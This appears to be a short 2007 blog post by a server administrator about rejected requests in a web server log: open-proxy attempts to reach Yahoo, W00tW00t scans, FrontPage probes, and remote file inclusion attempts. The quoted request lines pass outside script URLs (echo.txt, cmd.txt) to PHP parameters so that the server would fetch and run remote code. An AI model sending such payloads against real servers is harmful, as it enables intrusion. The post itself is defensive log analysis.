Since 22-Sep-2007, there have been attempts to get to Yahoo.com in the Uk – via this server:
"GET http://uk.yahoo.com/ HTTP/1.1"
The amount increases, of all rejected requests this is now the most common one. All “403” of course.
The number of W00tW00t requests increases as well, but all on HTTP/1.1 – and ewach fails with error 400. Have to findf out why, because the HTTP/1.0 succeeds.
And there are quite a lot of requests to cgi-bin/query. Stupid ones, but trying to bypass something?
Building Micrsoft stuff won’t work, dudes:
GET /cgi-bin/query/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1
GET /MSOffice/cltreq.asp HTTP/1.1
GET /cgi-bin/query/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1
And trying to bypass securtity and monitoring using the server won’t work either:
GET /cgi-bin/query/openVMS/HOW_TO/CommunigatePro/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
...
GET /cgi-bin/query/openVMS/HOW_TO/PHP/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
I didn’t look into echo.txt and cmd.txt, but these are likely scripts.